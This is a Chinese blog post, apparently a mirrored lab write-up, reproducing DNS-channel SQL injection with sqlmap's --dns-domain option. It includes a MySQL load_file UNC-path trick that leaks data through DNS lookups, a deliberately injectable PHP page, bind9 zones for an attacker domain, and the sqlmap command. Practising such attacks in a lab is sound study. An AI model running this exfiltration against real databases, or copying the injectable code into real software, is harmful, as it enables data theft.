因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入,所以想本地模拟一个环境进行测试。

首先dns注入

mysql> show variables like '%skip%';

+------------------------+-------+

| Variable_name          | Value |

+------------------------+-------+

| skip_external_locking  | ON    |

| skip_name_resolve      | OFF   |

| skip_networking        | OFF   |

| skip_show_database     | OFF   |

| slave_skip_errors      | OFF   |

| sql_slave_skip_counter | 0     |

+------------------------+-------+

6 rows in set

这里可以看到   | skip_name_resolve | OFF |

说明是可以进行域名解析

那么mysql 发起dns查询请求用什么语句呢

mysql> select load_file('\\\\fdsafdsfdssx.xxxx.com\\1.txt');

+-----------------------------------------------+

| load_file('\\\\fdsafdsfdssx.xxxx.com\\1.txt') |

+-----------------------------------------------+

| NULL                                          |

+-----------------------------------------------+

1 row in set

mysql> select

'\\\\fdsafdsfdssx.xxxx.com\\1.txt';

+-------------------------------+

| \\fdsafdsfdssx.xxxx.com\1.txt |

+-------------------------------+

| \\fdsafdsfdssx.xxxx.com\1.txt |

+-------------------------------+

1 row in set

这里看到 \\xxxxx.com\1.txt 是不是联系到了获取共享文件SMB协议,因为这里是域名所以会发起dns查询查对应ip

那么我们就可以想到用

来获取数据。

接下来模拟测试环境 用 sqlmap --dns-domain 参数进行dns通道注入

A  ->  win8   -> web server && sqli

B  -> ubuntu 14 -> sqlmap

C  -> ubuntu    -> bind9 service

首先A运行php mysql apache 环境 随便写一个sql注入点

<?php

$con = mysql_connect("localhost","root","root") or die();

mysql_select_db("burp");

$id = $_GET['id'];

$sql = "select host from burp where id=".$id; // 数字型

//$sql = "select `new` from `sql` where id="."'".$id."'"; // 字符型

echo $sql;

$res = mysql_query($sql);

echo "<br><br>";

echo "<b>";

while($rows = mysql_fetch_array($res,MYSQL_ASSOC)){

    echo $rows['host'];

}

echo "<b>";

?>

相当明显的一个注入点

B sqlmap  不多说

C bind9 服务

配置如下

zone "attaker.com" {

        type master;

        file "/etc/bind/zones/attaker.com.db";

        };

zone "whoami.com"{

        type forward;

        forwarders {192.168.199.144;};   # B机器ip

};

# This is the zone definition for reverse DNS. replace 0.168.192 with your network address in reverse notation - e.g my network address is 192.168.0

zone "199.168.192.in-addr.arpa" {

     type master;

     file "/etc/bind/zones/rev.199.168.192.in-addr.arpa";

};

其中关键点就是forwarded 转发到B机器上

root@depy:/etc/bind/zones# vi attaker.com.db

attaker.com.      IN      SOA     ns1.attaker.com. admin.attaker.com. (

        2006081401

        28800

        3600

        604800

        38400

        )

attaker.com.      IN      NS              ns1.attaker.com.

attaker.com.      IN      MX     10       mta.attaker.com.

                 IN      A       192.168.199.129

www              IN      A       192.168.199.129

mta              IN      A       192.168.199.129

ns1              IN      A       192.168.199.144

root@depy:/etc/bind/zones# vi rev.199.168.192.in-addr.arpa

@ IN SOA ns1.attaker.com. admin.attaker.com. (

                        2006081401;

                        28800;

                        604800;

                        604800;

                        86400

)

                     IN    NS     ns1.attaker.com.

1                    IN    PTR    attaker.com

这样就配置好了,启动bind服务。

然后将win8的dns指向C的ip

启动sqlmap

python sqlmap.py -u "http://192.168.199.210/sqli.php?id=5000" --tech "B" --dns-domain "whoami.com" --dbs

同时b上面开启tcpdump

root@depy:~# tcpdump -i eth0 -nt -s 500 port domain |grep whoami

发现A机器有发起dns请求过来

最后用burp抓一下sqlmap的数据

sqlmap --dns-domain模拟实践的更多相关文章

  1. 美图App的移动端DNS优化实践:HTTPS请求耗时减小近半

    本文引用了颜向群发表于高可用架构公众号上的文章<聊聊HTTPS环境DNS优化:美图App请求耗时节约近半案例>的部分内容,感谢原作者. 1.引言 移动互联网时代,APP 厂商之间的竞争非常 ...

  2. 从理论到实践,全方位认识DNS

    从理论到实践,全方位认识DNS 2015-11-23 程序员之家 作者:selfboot 原文:http://segmentfault.com/a/1190000003956853 对于 DNS(Do ...

  3. 从理论到实践,全方位认识DNS(理论篇)

    对于 DNS(Domain Name System) 大家肯定不陌生,不就是用来将一个网站的域名转换为对应的IP吗.当我们发现可以上QQ但不能浏览网页时,我们会想到可能是域名服务器挂掉了:当我们用别人 ...

  4. DNS 域名系统 (Domain Name System)

      DNS 域名系统 (Domain Name System) 许多应用层软件经常直接使用域名系统 DNS (Domain Name System),但计算机的用户只是间接而不是直接使用域名系统. 因 ...

  5. sqlmap用法

    用法 Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show a ...

  6. DNS简析

    IntroductionName Server架构分层管理机制分层查询机制Name Server之间的Master-Slave架构DDNS底层协议配置文件/etc/hosts/etc/resov.co ...

  7. Web前端性能优化教程06:减少DNS查找、避免重定向

    本文是Web前端性能优化系列文章中的第六篇,主要讲述内容:减少DNS查找.避免重定向.完整教程可查看:  一.减少DNS查找 基础知识 DNS(Domain Name System): 负责将域名UR ...

  8. CentOS7系统安装DNS服务

    CentOS7系统安装DNS服务 30.1.DNS是什么? DNS ( Domain Name System )是"域名系统"的英文缩写,简单来说就是一个数据库,用于存储网络中IP ...

  9. DNS实战--1

    DNS(Domain Name System,域名系统)因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户方便的访问互联网,而不用去记住能够被机器读取的IP数串.通过主机名,最终得到该主 ...

随机推荐

  1. Mac下安装ElasticSearch

    简单记录一下安装ES的过程,给小小白们提供一下参考: 下载安装包 https://www.elastic.co/downloads/elasticsearch建议下载2.3.2版本,最新的5.0.0版 ...

  2. Struts2入门(七)——Struts2的文件上传和下载

    一.前言 在之前的随笔之中,我们已经了解Java通过上传组件来实现上传和下载,这次我们来了解Struts2的上传和下载. 注意:文件上传时,我们需要将表单提交方式设置为"POST" ...

  3. 关于IOS中safari下的select下拉菜单,文字过长不换行的问题

    今天遇到下图这种问题,文字过长,显示不全.折腾了老半天,在网上搜了半天也找不到解决方案. 于是问了下同事,同事提到了<optgroup>,这个标签厉害. <optgroup> ...

  4. sql case when...then...else...end 选择判断

    达到的需求为: 吓数收回日期为空:当接单日期不等于空和当天减接单日期大于3天时,为1,否则为0:当接单日期为空.最大发织交期不等于空和当天减去最大发织交期大于3天时,为1,否则为0:当接单日期和发织交 ...

  5. cookie存储对象信息

    最近看到某公司某项目中用于保存多个城市信息到cookie中的方法,该方法的逻辑是按时间顺序记录最近访问过的三个城市的名字及id,逻辑包插入与含排重.插入与排重的代码如下: 1 2 3 4 5 6 7 ...

  6. 弹出层layer的使用

    弹出层layer的使用 Intro layer是一款web弹层组件,致力于服务各个水平段的开发人员.layer官网:http://layer.layui.com/ layer侧重于用户灵活的自定义,为 ...

  7. c#进阶之神奇的CSharp

    CSharp 简写为c#,是一门非常年轻而又有活力的语言. CSharp的诞生      在2000年6月微软发布了c#这门新的语言.作为微软公司.NET 平台的主角,c#吸收了在他之前诞生的语言(c ...

  8. APP级别处理未捕获异常

    前言: 项目APP有时候会出现Crash,然后就是弹出系统强制退出的对话框,点击关闭APP. 有的APP进行了处理,会发现,当程序出现异常的时候,会Toast一个提示"程序出现异常,3秒后将 ...

  9. android 自定义通知栏

    package com.example.mvp; import cn.ljuns.temperature.view.TemperatureView;import presenter.ILoginPre ...

  10. Mybatis环境

    第一步:下载jar包并导入 1.mysql驱动包 2.mybatis环境包 第二步:创建MYSQL数据库 由于这是用于测试,只创建了test-usreinfo数据表 第三步:在src文件夹中创建myb ...